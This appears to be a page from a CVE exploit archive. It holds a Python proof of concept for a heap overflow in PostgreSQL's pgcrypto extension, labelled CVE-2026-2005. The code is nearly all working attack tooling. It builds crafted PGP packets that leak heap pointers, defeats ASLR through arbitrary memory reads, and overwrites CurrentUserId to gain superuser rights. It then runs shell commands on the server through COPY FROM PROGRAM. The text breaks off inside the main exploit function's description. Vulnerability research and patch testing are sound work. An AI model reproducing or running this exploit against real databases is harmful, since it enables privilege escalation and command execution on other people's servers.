5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/python

import argparse
import re
import struct
import secrets
import subprocess
import sys
import time
from typing import Tuple
import psycopg2

# pwn for binary manipulation and debugging
from pwn import *
context.arch = 'aarch64'

# Cryptographic libraries, to craft the PGP data.
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse

# AES key used for session key encryption (16 bytes for AES-128)
AES_KEY = b'\x01' * 16

def generate_rsa_keypair(key_size: int = 2048) -> dict:
    """
    Generate a fresh RSA key pair.

    The generated key includes all components needed for PGP operations:
    - n: public modulus (p * q)
    - e: public exponent (typically 65537)
    - d: private exponent (e^-1 mod phi(n))
    - p, q: prime factors of n
    - u: coefficient (p^-1 mod q) for CRT optimization

    The caller can pass the wanted key size in input, for a default of 2048
    bytes.  This function returns the RSA key components, after performing
    some validation on them.
    """

    # Generate RSA key
    key = RSA.generate(key_size)

    # Extract all key components
    rsa_components = {
        'n': key.n,      # Public modulus (p * q)
        'e': key.e,      # Public exponent (typically 65537)
        'd': key.d,      # Private exponent (e^-1 mod phi(n))
        'p': key.p,      # First prime factor
        'q': key.q,      # Second prime factor
        'u': inverse(key.p, key.q)  # Coefficient for CRT: p^-1 mod q
    }

    # Validate key components for correctness
    validate_rsa_key(rsa_components)

    return rsa_components

def validate_rsa_key(rsa: dict) -> None:
    """
    Validate a generated RSA key.

    This function performs basic validation to ensure the RSA key is properly
    constructed and all components are consistent, at least mathematically.

    Validations performed:
    1. n = p * q (modulus is product of primes)
    2. gcd(e, phi(n)) = 1 (public exponent is coprime to phi(n))
    3. (d * e) mod(phi(n)) = 1 (private exponent is multiplicative inverse)
    4. (u * p) (mod q) = 1 (coefficient is correct for CRT)
    """

    n, e, d, p, q, u = rsa['n'], rsa['e'], rsa['d'], rsa['p'], rsa['q'], rsa['u']

    # Check that n = p * q
    if n != p * q:
        raise ValueError("RSA validation failed: n <> p * q")

    # Check that p and q are different
    if p == q:
        raise ValueError("RSA validation failed: p = q (not allowed)")

    # Calculate phi(n) = (p-1)(q-1)
    phi_n = (p - 1) * (q - 1)

    # Check that gcd(e, phi(n)) = 1
    def gcd(a, b):
        while b:
            a, b = b, a % b
        return a

    if gcd(e, phi_n) != 1:
        raise ValueError("RSA validation failed: gcd(e, phi(n)) <> 1")

    # Check that (d * e) mod(lcm(p-1, q-1)) = 1
    # PyCryptodome computes d using the Carmichael function lcm(p-1, q-1),
    # not Euler's totient phi(n). Both satisfy the RSA requirement.
    lambda_n = (p - 1) // gcd(p - 1, q - 1) * (q - 1)
    if (d * e) % lambda_n != 1:
        raise ValueError("RSA validation failed: d * e <> 1 (mod lcm(p-1, q-1))")

    # Check that (u * p) (mod q) = 1
    if (u * p) % q != 1:
        raise ValueError("RSA validation failed: u * p <> 1 (mod q)")

def mpi_encode(x: int) -> bytes:
    """
    Encode an integer as an OpenPGP Multi-Precision Integer (MPI).

    Format (RFC 4880, Section 3.2):
    - 2 bytes: bit length of the integer (big-endian)
    - N bytes: the integer in big-endian format

    This is used to encode RSA key components (n, e, d, p, q, u) in PGP
    packets.

    The integer to encode is given in input, returning an MPI-encoded
    integer.

    For example:
        mpi_encode(65537) -> b'\x00\x11\x01\x00\x01'
        (17 bits, value 0x010001)
    """
    if x < 0:
        raise ValueError("MPI cannot encode negative integers")

    if x == 0:
        # Special case: zero has 0 bits and empty magnitude
        bits = 0
        mag = b""
    else:
        # Calculate bit length and convert to bytes
        bits = x.bit_length()
        mag = x.to_bytes((bits + 7) // 8, 'big')

    # Pack: 2-byte bit length + magnitude bytes
    return struct.pack('>H', bits) + mag

def new_packet(tag: int, payload: bytes) -> bytes:
    """
    Create a new OpenPGP packet with a proper header.

    OpenPGP packet format (RFC 4880, Section 4.2):
    - New packet format: 0xC0 | tag
    - Length encoding depends on payload size:
      * 0-191: single byte
      * 192-8383: two bytes (192 + ((length - 192) >> 8), (length - 192) & 0xFF)
      * 8384+: five bytes (0xFF + 4-byte big-endian length)

    The packet is built from a "tag" (1-63) and some "payload" data.  The
    result generated is a complete OpenPGP packet.

    For example:
        new_packet(1, b'data') -> b'\xC1\x04data'
        (Tag 1, length 4, payload 'data')
    """
    # New packet format: set bit 7 and 6, clear bit 5, tag in bits 0-5
    first = 0xC0 | (tag & 0x3F)
    ln = len(payload)

    # Encode length according to OpenPGP specification
    if ln <= 191:
        # Single byte length for small packets
        llen = bytes([ln])
    elif ln <= 8383:
        # Two-byte length for medium packets
        ln2 = ln - 192
        llen = bytes([192 + (ln2 >> 8), ln2 & 0xFF])
    else:
        # Five-byte length for large packets
        llen = bytes([255]) + struct.pack('>I', ln)

    return bytes([first]) + llen + payload

def build_key_data(rsa: dict) -> bytes:
    """
    Build the key data, containing an RSA private key.

    The RSA contents should have been generated previously.

    Format (see RFC 4880, Section 5.5.3):
    - 1 byte: version (4)
    - 4 bytes: creation time (current Unix timestamp)
    - 1 byte: public key algorithm (2 = RSA encrypt)
    - MPI: RSA public modulus n
    - MPI: RSA public exponent e
    - 1 byte: string-to-key usage (0 = no encryption)
    - MPI: RSA private exponent d
    - MPI: RSA prime p
    - MPI: RSA prime q
    - MPI: RSA coefficient u = p^-1 mod q
    - 2 bytes: checksum of private key material

    This function takes a set of RSA key components in input (n, e, d, p, q, u)
    and returns a secret key packet.
    """

    # Public key portion
    ver = bytes([4])                           # Version 4 key
    ctime = struct.pack('>I', int(time.time())) # Current Unix timestamp
    algo = bytes([2])                          # RSA encrypt algorithm
    n_mpi = mpi_encode(rsa['n'])               # Public modulus
    e_mpi = mpi_encode(rsa['e'])               # Public exponent
    pub = ver + ctime + algo + n_mpi + e_mpi

    # Private key portion
    hide_type = bytes([0])              # No string-to-key encryption
    d_mpi = mpi_encode(rsa['d'])        # Private exponent
    p_mpi = mpi_encode(rsa['p'])        # Prime p
    q_mpi = mpi_encode(rsa['q'])        # Prime q
    u_mpi = mpi_encode(rsa['u'])        # Coefficient u = p^-1 mod q

    # Calculate checksum of private key material (simple sum mod 65536)
    private_data = d_mpi + p_mpi + q_mpi + u_mpi
    cksum = sum(private_data) & 0xFFFF

    secret = hide_type + private_data + struct.pack('>H', cksum)
    payload = pub + secret

    return new_packet(7, payload)

def pgp_cfb_encrypt_resync(key, plaintext):
    """
    Implement OpenPGP CFB mode with resync.

    OpenPGP CFB mode is a variant of standard CFB with a resync operation
    after the first two blocks.

    Algorithm (RFC 4880, Section 13.9):
    1. Block 1: FR=zeros, encrypt full block_size bytes
    2. Block 2: FR=block1, encrypt only 2 bytes
    3. Resync: FR = block1[2:] + block2
    4. Remaining blocks: standard CFB mode

    This function uses the following arguments:
    - key: AES encryption key (16 bytes for AES-128)
    - plaintext: Data to encrypt
    """
    block_size = 16  # AES block size
    cipher = AES.new(key[:16], AES.MODE_ECB)  # Use ECB for manual CFB
    ciphertext = b''

    # Block 1: FR=zeros, encrypt full 16 bytes
    FR = b'\x00' * block_size
    FRE = cipher.encrypt(FR)  # Encrypt the feedback register
    block1 = bytes(a ^ b for a, b in zip(FRE, plaintext[0:16]))
    ciphertext += block1

    # Block 2: FR=block1, encrypt only 2 bytes
    FR = block1
    FRE = cipher.encrypt(FR)
    block2 = bytes(a ^ b for a, b in zip(FRE[0:2], plaintext[16:18]))
    ciphertext += block2

    # Resync: FR = block1[2:16] + block2[0:2]
    # This is the key difference from standard CFB mode
    FR = block1[2:] + block2

    # Block 3+: Continue with standard CFB mode
    pos = 18
    while pos < len(plaintext):
        FRE = cipher.encrypt(FR)
        chunk_len = min(block_size, len(plaintext) - pos)
        chunk = plaintext[pos:pos+chunk_len]
        enc_chunk = bytes(a ^ b for a, b in zip(FRE[:chunk_len], chunk))
        ciphertext += enc_chunk

        # Update feedback register for next iteration
        if chunk_len == block_size:
            FR = enc_chunk
        else:
            # Partial block: pad with old FR bytes
            FR = enc_chunk + FR[chunk_len:]
        pos += chunk_len

    return ciphertext

def build_literal_data_packet(data: bytes) -> bytes:
    """
    Build a literal data packet containing a message.

    Format (RFC 4880, Section 5.9):
    - 1 byte: data format ('b' = binary, 't' = text, 'u' = UTF-8 text)
    - 1 byte: filename length (0 = no filename)
    - N bytes: filename (empty in this case)
    - 4 bytes: date (current Unix timestamp)
    - M bytes: literal data

    The data used to build the packet is given in input, with the generated
    result returned.
    """
    body = bytes([
        ord('b'),                              # Binary data format
        0,                                     # Filename length (0 = no filename)
    ]) + struct.pack('>I', int(time.time())) + data  # Current timestamp + data

    return new_packet(11, body)

def build_symenc_data_packet(sess_key: bytes, cipher_algo: int, payload: bytes) -> bytes:
    """
    Build a symmetrically-encrypted data packet using AES-128-CFB.

    This packet contains encrypted data using the session key. The format
    includes a random prefix, for security (see RFC 4880, Section 5.7).

    Packet structure:
    - Random prefix (block_size bytes)
    - Prefix repeat (last 2 bytes of prefix repeated)
    - Encrypted literal data packet

    This function uses the following set of arguments:
    - sess_key: Session key for encryption
    - cipher_algo: Cipher algorithm identifier (7 = AES-128)
    - payload: Data to encrypt (wrapped in literal data packet)
    """
    block_size = 16  # AES-128 block size
    key = sess_key[:16]  # Use first 16 bytes for AES-128

    # Create random prefix + repeat last 2 bytes (total 18 bytes)
    # This is required by OpenPGP for integrity checking
    prefix_random = secrets.token_bytes(block_size)
    prefix = prefix_random + prefix_random[-2:]  # 18 bytes total

    # Wrap payload in literal data packet
    literal_pkt = build_literal_data_packet(payload)

    # Plaintext = prefix + literal data packet
    plaintext = prefix + literal_pkt

    # Encrypt using OpenPGP CFB mode with resync
    ciphertext = pgp_cfb_encrypt_resync(key, plaintext)

    return new_packet(9, ciphertext)

def build_tag1_packet(rsa: dict, sess_key: bytes) -> bytes:
    """
    Build a public-key encrypted key.

    This is a very important function, as it is able to create the packet
    triggering the overflow check.  This function can also be used to create
    "legit" packet data.

    Format (RFC 4880, Section 5.1):
    - 1 byte: version (3)
    - 8 bytes: key ID (0 = any key accepted)
    - 1 byte: public key algorithm (2 = RSA encrypt)
    - MPI: RSA-encrypted session key

    This uses in arguments the generated RSA key pair, and the session key
    to encrypt.  The latter is manipulated to trigger the overflow.

    This function returns a complete packet encrypted by a session key.
    """

    # Calculate RSA modulus size in bytes
    n_bytes = (rsa['n'].bit_length() + 7) // 8

    # Session key message format:
    # - 1 byte: symmetric cipher algorithm (7 = AES-128)
    # - N bytes: session key
    # - 2 bytes: checksum (simple sum of session key bytes)
    algo_byte = bytes([7])  # AES-128 algorithm identifier
    cksum = sum(sess_key) & 0xFFFF  # 16-bit checksum
    M = algo_byte + sess_key + struct.pack('>H', cksum)

    # PKCS#1 v1.5 padding construction
    # Format: 0x02 || PS || 0x00 || M
    # Total padded message must be exactly n_bytes long.
    total_len = n_bytes  # Total length must equal modulus size in bytes
    ps_len = total_len - len(M) - 2  # Subtract 2 for 0x02 and 0x00 bytes

    if ps_len < 8:
        raise ValueError(f"Padding string too short ({ps_len} bytes); need at least 8 bytes. "
                        f"Message length: {len(M)}, Modulus size: {n_bytes} bytes")

    # Create padding string with *ALL* bytes being 0xFF (no zero separator!)
    PS = bytes([0xFF]) * ps_len

    # Construct the complete padded message
    # Normal PKCS#1 v1.5 padding: 0x02 || PS || 0x00 || M
    padded = bytes([0x02]) + PS + bytes([0x00]) + M

    # Verify padding construction
    if len(padded) != n_bytes:
        raise ValueError(f"Padded message length ({len(padded)}) doesn't match RSA modulus size ({n_bytes})")

    # Convert padded message to integer and encrypt with RSA
    m_int = int.from_bytes(padded, 'big')

    # Ensure message is smaller than modulus (required for RSA)
    if m_int >= rsa['n']:
        raise ValueError("Padded message is larger than RSA modulus")

    # RSA encryption: c = m^e mod n
    c_int = pow(m_int, rsa['e'], rsa['n'])

    # Encode encrypted result as MPI
    c_mpi = mpi_encode(c_int)

    # Build complete packet
    ver = bytes([3])           # Version 3 packet
    key_id = b"\x00" * 8      # Key ID (0 = any key accepted)
    algo = bytes([2])         # RSA encrypt algorithm
    payload = ver + key_id + algo + c_mpi

    return new_packet(1, payload)

SRC_CHUNK_OFFSET = 100
DST_CHUNK_OFFSET = 172
SRC_CHUNK_HDR = [
 0x01,   0x01,   0x72,   0xaa,   0xbb,   0xbe,   0x00,   0x00,
 0x63,   0x00,   0x00,   0x00,   0xc0,   0x04,   0x00,   0x00
]


def build_leak_mdst_ptr_payload(rsa: dict) -> bytes:
    """
    Build a crafted PGP message to leak the mdst data pointer via
    the pfree() invalid pointer error message.

    Returns a concatenated set of PGP packets crafted for heap
    exploitation.  The mdst chunk headers are set up so that the
    mbuf struct's data pointer is exposed by a pfree() error.

    After the first run leaks the pointer, a second payload can target
    the correct address for arbitrary read.

    How it works:
    ------------
    The crafted prefix is embedded into an RSA-encrypted session key
    packet (Tag 1). During decryption, the session key bytes are parsed
    as a length prefix for mbuf chunk allocation. By crafting the session
    key bytes to match a fake chunk header (SRC_CHUNK_HDR), we overflow
    the mdst buffer's malloc chunk metadata. When PostgreSQL later tries
    to pfree() the corrupted chunk, it detects the invalid chunk header
    and throws an error message containing the invalid pointer address,
    effectively leaking the mdst->data heap pointer to us.

    The three-packet structure (Tag1, SymEnc, Tag1) ensures:
    - First Tag1: sets up the overflow payload
    - SymEnc: provides the cover encrypted data packet
    - Second Tag1: triggers the actual overflow during session key handling
    """
    # Craft the overflow payload: fill with padding, insert a fake source
    # chunk header at SRC_CHUNK_OFFSET, then place a fake destination
    # chunk header at DST_CHUNK_OFFSET with controlled values that
    # corrupt the malloc metadata for the mdst buffer.
    payload = b"\x01" * 32
    payload += b"\x02" * (SRC_CHUNK_OFFSET - len(payload))
    payload += bytes(SRC_CHUNK_HDR)
    payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
    payload += bytes([
          0x42,   0x42,   0x42,   0x42,   0x42,   0x42,   0x42,   0x42,
          0x42,   0x42,   0x42,   0x42,
    ])

    prefix = payload + p32(len(payload))
    sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a\x00")

    packets = [
        build_tag1_packet(rsa, prefix),
        sedata,
        build_tag1_packet(rsa, prefix),
    ]
    return b"".join(packets)


def build_sql(message_data: bytes, key_data: bytes) -> str:
    """Build the SQL query from message and key hex data."""
    msg_hex = message_data.hex()
    key_hex = key_data.hex()
    msg_hex = re.sub("(.{72})", "\\1\n", msg_hex, 0, re.DOTALL)
    key_hex = re.sub("(.{72})", "\\1\n", key_hex, 0, re.DOTALL)
    return f'''SELECT pgp_pub_decrypt_bytea(
'\\x{msg_hex}'::bytea,
'\\x{key_hex}'::bytea);'''


def generate_payload(rsa: dict, mode: str, leaked_ptr: int|None = None) -> Tuple[bytes, bytes]:
    """
    Generate the PGP message and key data using the selected mode.

    In 'leak' mode: craft a payload that corrupts mdst chunk header and
    leaks the heap pointer via the pfree() error message.

    In 'exploit' mode: craft a payload that overwrites mdst->data with
    (leaked_ptr - 0x10000), causing the decryption output to contain memory
    from 0x10000 bytes before the leaked heap location. This region may
    contain PIE code pointers from earlier allocations, which we scan to
    resolve the ASLR base.
    """
    if mode == 'exploit' and leaked_ptr is not None:
        message_data = build_arb_read_payload(rsa, leaked_ptr - 0x10000)
    else:
        message_data = build_leak_mdst_ptr_payload(rsa)
    key_data = build_key_data(rsa)
    return message_data, key_data


def get_conn(conn_params: dict):
    """Create and return a psycopg2 connection from conn_params dict."""
    conn = psycopg2.connect(
        host=conn_params.get('host', ''),
        port=conn_params.get('port', 5432),
        dbname=conn_params.get('dbname', 'postgres'),
        user=conn_params.get('user', ''),
        password=conn_params.get('password', ''),
    )
    conn.autocommit = True
    return conn


def conn_params_from_args(args) -> dict:
    """Extract connection parameters from parsed CLI args into a dict."""
    return {
        'host': args.host,
        'port': args.port,
        'dbname': args.dbname or 'postgres',
        'user': args.user,
        'password': args.password or '',
    }


def execute_sql(sql: str, conn_params: dict, use_gdb: bool = False, ret_conn = False):
    """Execute SQL against PostgreSQL, return result string (data or error)."""
    conn = get_conn(conn_params)
    cur = conn.cursor()

    cur.execute("SELECT pg_backend_pid()")
    pid = cur.fetchone()[0]
    print(f"### Backend PID: {pid}", file=sys.stderr)

    if use_gdb:
        print("### Attaching GDB in tmux pane...", file=sys.stderr)
        print("### In the GDB pane: type 'continue' to resume the backend,", file=sys.stderr)
        print("### then 'continue' again through the breakpoint to trigger the overflow.",
              file=sys.stderr)
        gdb.attach(pid, gdbscript="""set architecture aarch64
set breakpoint pending on
b pgp-decrypt.c:1123
b parse_symenc_data
b pgp-pgsql.c:528
continue
""")
        time.sleep(2)

    def to_hex(v):
        if isinstance(v, memoryview):
            return v.tobytes().hex()
        return str(v)

    print("### Executing query...", file=sys.stderr)
    try:
        cur.execute(sql)
        rows = cur.fetchall()
        formatted = [[to_hex(v) for v in row] for row in rows]
        result = str(formatted)
    except Exception as e:
        result = str(e)

    if ret_conn:
        return conn
    return result


def load_symbols(binary_path: str) -> list:
    """
    Load symbol offsets from a binary ELF using readelf.

    Returns a list of (name, offset, size) tuples sorted by offset.
    """
    try:
        out = subprocess.check_output(
            ['readelf', '-sW', binary_path],
            stderr=subprocess.DEVNULL
        ).decode()
    except (subprocess.CalledProcessError, FileNotFoundError) as e:
        raise RuntimeError(f"cannot read symbols from {binary_path}: {e}")

    symbols = []
    for line in out.splitlines():
        parts = line.split()
        # readelf -sW: Num: Value Size Type Bind Vis Ndx Name
        if len(parts) < 8:
            continue
        try:
            offset = int(parts[1], 16)
            size = int(parts[2])
        except ValueError:
            continue
        typ = parts[3]
        name = parts[7]
        if typ not in ('FUNC', 'OBJECT'):
            continue
        if offset == 0:
            continue
        symbols.append((name, offset, size))

    symbols.sort(key=lambda x: x[1])
    return symbols


def resolve_pie_base(leaked_addrs: list, symbols: list, page_size: int = 0x1000) -> dict:
    """
    Stage 4: Match leaked absolute addresses against known ELF symbol
    offsets to compute PIE base candidates via a voting mechanism.

    PIE (Position Independent Executable) loads the binary at a random
    base address. Each symbol's runtime address = PIE_base + sym_offset.

    For each (leaked_addr, sym_offset) pair:
        PIE_base = leaked_addr - sym_offset

    This subtraction only yields a valid page-aligned base when both
    share the same page offset (low 12 bits). So we only consider
    (leaked_addr, sym_offset) pairs where the page offset matches.

    Each matching pair casts a "vote" for its computed base. The true
    PIE base should accumulate many votes because multiple symbols'
    addresses are stored on the heap near eath other.

    Filtering:
    - Candidates with >= 10 votes are kept (noise floor)
    - Take the 10 smallest bases (PIE is the lowest-mapped ELF segment)
    - Sort by votes descending (best candidate first)

    Returns a dict: {pie_base: vote_count} sorted by votes descending.
    """
    votes = {}
    mask = page_size - 1
    for addr in leaked_addrs:
        lo_page = addr & mask
        for _name, sym_off, _sz in symbols:
            if (sym_off & mask) != lo_page:
                continue
            if sym_off >= addr:
                continue
            base = addr - sym_off
            votes[base] = votes.get(base, 0) + 1
    # Filter to candidates with >= 10 votes, take the 10 smallest bases
    # (PIE is always the lowest-mapped ELF), then sort by votes descending.
    filtered = {k: v for k, v in votes.items() if v >= 10}
    sorted_by_addr = sorted(filtered.items(), key=lambda x: x[0])[:10]
    sorted_by_votes = sorted(sorted_by_addr, key=lambda x: x[1], reverse=True)
    return dict(sorted_by_votes)

def build_arb_write_payload(rsa: dict, mdst_addr: int, target_addr: int) -> bytes:
    """
    Stage 6: Build a crafted PGP message that overwrites memory at
    target_addr with attacker-controlled data.

    This is the most delicate part of the exploit. The overflow corrupts
    both the mdst AND the msrc MBuf chunk headers. After the overflow,
    the msrc pointer (source buffer) is corrupted, so we must carefully
    reconstruct it to point at valid PGP data.

    Key insight — we embed a symenc data packet (sedata2) at the end of
    our payload. This packet contains the data we want to write (in this
    case, p32(10) = superuser OID). We forge msrc->data and
    msrc->read_pos to point into this embedded symenc packet, so the
    decryption engine reads from it and writes the decrypted result into
    the corrupted mdst buffer (which points at target_addr).

    We use target_addr - 4 because pgp_pgsql.c:533 does:
        res_len = mbuf_steal_data(dst, &restmp);
        SET_VARSIZE(res, res_len);
    SET_VARSIZE writes the length into the first 4 bytes of the output
    buffer. So to overwrite CurrentUserId starting at its actual address,
    we need to account for the 4-byte SET_VARSIZE header.
    """

    # sedata: small symenc packet for cover (needed for initial packet parsing)
    sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a")

    # sedata2: the write payload — when decrypted, produces p32(10)+p32(10)
    # which contains the value 10 (superuser OID) to overwrite CurrentUserId.
    # We embed this at a known offset and point msrc at it.
    sedata2 = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=p32(10)+p32(10))

    # Forged mdst MBuf: the destination buffer. data pointer set to target_addr
    # so that decrypted output is written there, overwriting CurrentUserId.
    mdst = p64(target_addr)              # data = target address
    mdst += p64(target_addr)             # data_end
    mdst += p64(target_addr)             # read_pos (unused for dst)
    mdst += p64(0xffffffffffff)          # buf_end = huge (prevent repalloc)
    mdst += b'\x00' * 2                  # no_write=0, own_data=0

    # Forged msrc MBuf: the source buffer. After the overflow corrupts the
    # real msrc, we forge a new one whose data/read_pos point at sedata2,
    # the symenc packet embedded at the end of the payload.
    # The offsets are relative to mdst_addr (the heap address we leaked):
    #   mdst struct ends at mdst_addr + len(mdst)
    #   sedata2 starts right after mdst (at mdst_addr + len(mdst))
    #   sedata2 ends at mdst_addr + len(mdst) + len(sedata2)
    msrc = p64(mdst_addr + len(mdst))                # data = start of sedata2
    msrc += p64(mdst_addr + len(mdst) + len(sedata2)) # data_end = end of sedata2
    msrc += p64(mdst_addr + len(mdst))               # read_pos = start of sedata2
    msrc += p64(0xffffffffffff)          # buf_end = huge (prevent repalloc)
    msrc += b'\x00' * 2                  # no_write=0, own_data=0
    msrc += b'\x00' * 6                  # padding

    # Build the overflow payload: padding + fake src chunk header + forged
    # msrc struct + padding + fake dst chunk header + forged mdst struct.
    payload = b'\x01' * 16
    payload += p32(0x10)
    payload += p32(0x10)
    payload += p32(0x10)
    payload += p32(0x10)
    payload += p32(0x10)
    payload += b"\x01" * (SRC_CHUNK_OFFSET - len(payload))
    payload += bytes(SRC_CHUNK_HDR)
    payload += msrc
    payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
    payload += bytes([
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x63, 0x00, 0x00, 0x00, 0xe0, 0x05, 0x00, 0x00,
    ])

    # Append sedata2 (the write payload) right after the mdst struct.
    # The msrc pointers we forged above reference this exact data.
    mdst += sedata2
    payload += mdst

    prefix = payload + p32(len(payload))
    packets = [
        build_tag1_packet(rsa, prefix),
    ]
    return b"".join(packets)

def build_arb_read_payload(rsa: dict, target_addr: int, read_size: int = 0x10000) -> bytes:
    """
    Stage 2: Build a crafted PGP message that reads memory from target_addr.

    After leaking the mdst heap pointer, we craft a second payload that
    overwrites the mdst MBuf's data pointer to point at an arbitrary
    address. After successful decryption, pgp_pgsql.c calls
    mbuf_steal_data(dst, &restmp) which returns dst->data as the output
    bytea. By setting dst->data = target_addr, we can read arbitrary
    memory — in this case, we read from leaked_ptr - 0x10000 to dump
    heap memory and find PIE (Position Independent Executable) addresses
    that can be used to resolve the ASLR base.

    The mdst struct fields we forge:
      data     = target_addr    (where to read from)
      data_end = target_addr + read_size  (bounds check bypass)
      read_pos = target_addr    (unused for destination buffer)
      buf_end  = 0x7fffffffffff (huge value, prevents repalloc from moving the buffer)
      no_write = 0, own_data = 0
    """
    # Fake encrypted data packet for msrc buf — provides cover for the
    # decryption stream so the packet processing doesn't abort early.
    sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a")

    # Build overflow prefix that corrupts the dst chunk header and
    # overlays a fake MBuf struct at DST_CHUNK_OFFSET.
    payload = b'\x01' * 16
    payload += p32(0x10)
    payload += b"\x01" * (SRC_CHUNK_OFFSET - len(payload))
    payload += bytes(SRC_CHUNK_HDR)
    payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
    payload += bytes([
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x63, 0x00, 0x00, 0x00, 0xe0, 0x05, 0x00, 0x00,
    ])

    # Fake mdst MBuf pointing at the target address
    mdst = p64(target_addr)              # data = target address
    mdst += p64(target_addr + read_size) # data_end
    mdst += p64(target_addr)             # read_pos (unused for dst)
    mdst += p64(0x7fffffffffff)          # buf_end = huge (prevent repalloc)
    mdst += b'\x00' * 2                  # no_write=0, own_data=0
    mdst += b'\x00' * 6                  # padding

    payload += mdst
    prefix = payload + p32(len(payload))
    packets = [
        build_tag1_packet(rsa, b'\x01' * 16),
        sedata,
        build_tag1_packet(rsa, prefix),
    ]
    return b"".join(packets)


# ---------------------------------------------------------------------------
# Exploit stages — each function handles one discrete step of the exploit.
# ---------------------------------------------------------------------------

def leak_mdst_pointer(rsa: dict, conn_params: dict) -> int | None:
    """
    Stage 1: Leak the mdst->data heap pointer via the pfree error message.

    The overflow payload corrupts the malloc chunk header of the mdst buffer.
    When PostgreSQL attempts to pfree() the mdst buffer at the end of
    decryption, the allocator detects the corrupted chunk metadata and
    raises an error: "pfree called with invalid pointer 0x...". We parse
    this error message to extract the heap address of mdst->data.
    """
    print("\n### === STAGE 1: leaking mdst pointer ===\n", file=sys.stderr)
    msg, key = generate_payload(rsa, 'leak')
    sql = build_sql(msg, key)
    result = execute_sql(sql, conn_params, use_gdb=False)

    match = re.search(r'pfree called with invalid pointer (0x[0-9a-fA-F]+)', result)
    if not match:
        print(f"ERROR: could not parse leaked pointer from: {result}", file=sys.stderr)
        return None

    leaked_ptr = int(match.group(1), 16)
    print(f"### Leaked mdst ptr: 0x{leaked_ptr:x}", file=sys.stderr)
    return leaked_ptr


def scan_for_pointers(result: str, leaked_ptr: int) -> list[int]:
    """
    Stage 3: Scan leaked hex dump for non-heap pointer candidates.

    The arbitrary read from stage 2 returns a hex dump of memory around
    leaked_ptr - 0x10000. We scan this dump for 8-byte little-endian
    values that look like code/data pointers (>= 0x500000000000) but
    are NOT heap addresses (they don't share the heap region prefix).
    These are potential PIE addresses that were stored on the heap and
    can be used to resolve the postgres binary's ASLR base.

    Because addresses may not be 8-byte aligned on the heap, we try
    8 different alignments (0-7 byte offsets) when scanning.
    """
    ADDR_LEN = 16
    BYTE_STEP = 2
    heap_region = leaked_ptr >> 28
    print(f"### Heap region prefix: 0x{heap_region:010x}", file=sys.stderr)

    hexdata = ''.join(c for c in result if c in '0123456789abcdef')
    print(f"### Scanning {len(hexdata)} hex chars for pointers:", file=sys.stderr)

    leaked_addrs = []
    for align in range(8):
        start = align * BYTE_STEP
        for i in range(start, len(hexdata) - ADDR_LEN + 1, ADDR_LEN):
            hex_slice = hexdata[i:i + ADDR_LEN]
            try:
                le_bytes = bytes.fromhex(hex_slice)
            except ValueError:
                continue
            addr = int.from_bytes(le_bytes, 'little')
            if addr < 0x500000000000:
                continue
            if (addr >> 28) == heap_region:
                continue
            if addr not in leaked_addrs:
                leaked_addrs.append(addr)

    print(f"### Collected {len(leaked_addrs)} unique non-heap candidates", file=sys.stderr)
    return leaked_addrs


def find_symbol_offset(symbols: list, name: str) -> int | None:
    """Find the offset of a named symbol in the symbol list."""
    for sym_name, off, _sz in symbols:
        if sym_name == name:
            return off
    return None


def query_expected_oid(conn_params: dict) -> int:
    """Query the expected CurrentUserId OID from the database."""
    conn = get_conn(conn_params)
    cur = conn.cursor()
    cur.execute("SELECT current_user::regrole::oid;")
    oid = cur.fetchone()[0]
    conn.close()
    return oid


def test_pie_candidate(rsa: dict, conn_params: dict, base: int,
                       current_user_offset: int, expected_oid: int) -> int | None:
    """
    Stage 5: Validate a PIE base candidate by performing an arbitrary read
    of the CurrentUserId variable.

    We know our own session's CurrentUserId OID (from querying the DB).
    By reading CurrentUserId at (base + current_user_offset) via our
    arbitrary read primitive, we can verify whether `base` is the correct
    PIE base. If the value matches expected_oid, we've confirmed the base.

    Returns the base if it matches, None otherwise.
    """
    target = base + current_user_offset
    print(f"### Testing PIE 0x{base:016x} (CurrentUserId @ 0x{target:016x})...", file=sys.stderr)
    msg = build_arb_read_payload(rsa, target, read_size=0x10)
    key = build_key_data(rsa)
    sql = build_sql(msg, key)
    result = execute_sql(sql, conn_params, use_gdb=False)
    hexdata = ''.join(c for c in result if c in '0123456789abcdef')
    if hexdata and len(hexdata) >= 8:
        val = int.from_bytes(bytes.fromhex(hexdata[:8]), 'little')
        match = "MATCH" if val == expected_oid else ""
        print(f"###   -> value: {val} (0x{val:x}) {match}", file=sys.stderr)
        return base if val == expected_oid else None
    print(f"###   -> no data returned", file=sys.stderr)
    return None


def execute_privileged_command(conn, cmd: str) -> str:
    """
    Stage 7: Execute an OS command via COPY FROM PROGRAM.

    After overwriting CurrentUserId to 10 (superuser OID), we can execute
    COPY FROM PROGRAM which runs arbitrary shell commands on the server.
    This confirms the exploit was successful.
    """
    cur = conn.cursor()
    cur.execute(f"""
CREATE TEMP TABLE cmd_out (line text);
  COPY cmd_out FROM PROGRAM '{cmd}';
  SELECT * FROM cmd_out;
    """)
    return '\n'.join([r[0] for r in cur.fetchall()])


def run_exploit(rsa: dict, conn_params: dict, binary_path: str, cmd: str, use_gdb: bool = False):
    """
    Autonomous multi-stage exploit against CVE-2026-2005 (pgcrypto heap overflow).

    Exploit flow (7 stages):
    1. Heap pointer leak — corrupt mdst chunk header, parse pfree() error
    2. Arbitrary read — overwrite mdst->data to (leaked_ptr - 0x10000),
       dumping heap memory that may contain PIE code pointers.
    3. Scan dump for non-heap addresses (candidate PIE pointers).
    4. Vote on PIE base: match candidate addresses against ELF symbol
       offsets from the postgres binary.
    5. Validate best candidate by reading CurrentUserId and comparing
       against our session's known OID.
    6. Arbitrary write: forge both msrc and mdst MBufs. msrc points at
       an embedded symenc packet containing encrypted superuser OID (10);
       mdst points at CurrentUserId - 4 (to account for SET_VARSIZE).
    7. Privilege escalation: with CurrentUserId=10, execute COPY FROM
